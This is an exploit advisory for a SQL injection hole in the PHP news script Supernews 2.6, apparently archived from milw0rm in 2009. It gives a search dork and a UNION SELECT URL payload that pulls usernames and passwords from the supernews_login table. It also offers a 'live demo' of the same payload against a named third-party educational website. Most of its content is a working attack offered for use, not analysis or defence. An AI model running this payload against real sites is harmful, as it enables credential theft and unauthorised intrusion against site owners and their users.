############################################################### Supernews 2.6 SQL Injection Vulnability ############################################################### Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817 ############################################################### Discovered by Observing and DD3str0y3r [Collaps3 CREW] - Made In Brazil ############################################################### Dork: Supernews 2.6 ####################################################################################################################################### Example: http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- LiveDEMO: http://ead.saomateus.edu.br/supernews/index.php?noticia=10+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- ####################################################################################################################################### gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends # milw0rm.com [2009-06-03]